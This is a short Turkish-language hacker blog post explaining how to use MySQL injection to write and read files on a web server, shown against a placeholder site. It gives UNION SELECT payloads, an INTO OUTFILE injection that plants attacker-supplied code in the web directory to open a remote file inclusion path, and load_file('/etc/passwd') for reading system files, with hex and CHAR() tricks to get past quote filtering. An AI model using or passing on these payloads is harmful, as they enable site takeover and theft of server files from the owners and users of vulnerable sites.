![# [e]XcaLibuR ~](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMhsuRakTAF0fFf04rdwBhv5RcgsFRryqR9e-wbEXY4K-F6CrcSnmXeT7KkMI8R8HwLzUR1ZCJWD2pLW4XDrc7iT1HoUuHE-OI5Oy7yBEypKSAEIKEq9mij7xClVdqkEdRffA1lsZvMg/s1600-r/banner.png)
S.A. arkadaşlar
Bu Konuda MySQL Injection Dosya Oluşturmak ~ Dosya Okumayı anlatacağım.
Mysql injection olayında dosya oluşturmak çok basittir.Örnek site
http://www.uydurdumbirsite.com/x.php?id=1
aldıgımız hatalara göre colomnları yazalım örnegin 5 colomn olsun
http://www.uydurdumbirsite.com?id=-1 union select 1,2,3,4,5
aldığımız hatada 3 olsun
http://www.uydurdumbirsite.com/x.php?id=-1 union select 1,2,’Buraya oluşturacağımız dosyanın kodu’,4,5 INTO+OUTFILE+’sitenin dizini/Oluşturacağınız dosyanın adı’/*
Burdan çıkarak Kendimize RFI yolu açabiliriz.
“buraya oluştracagimiz dosyanin kodu” yazan yere ’’
basit bir sayfa çağırma kodu ile kendimize rfi yolu açabiliriz.
Dosya okumak ise daha basit bir olay.load_file() fonksiyonu ile dosya okuyabilirsiniz.
şöyleki;
union select 1,2,load_file(etc/passwd) komutu ile etc dizinindeki passwd dosyasını okuyabilirsiniz yada sizin istediginiz dosyayı… ama bazen magic qoutes buna karşı koyar onun içinde hexleyip başına 0x katarak olayı çözebilirsiniz.bazende hexlemek yetmez charlayip yapmaya gerek kalabilir o da şöyle oluyorki;
LOAD_FILE(CHAR(charladiginz dizin))
gibi…
Selametle. // [e]XcaLibuR
Hiç yorum yok:
Yorum Gönder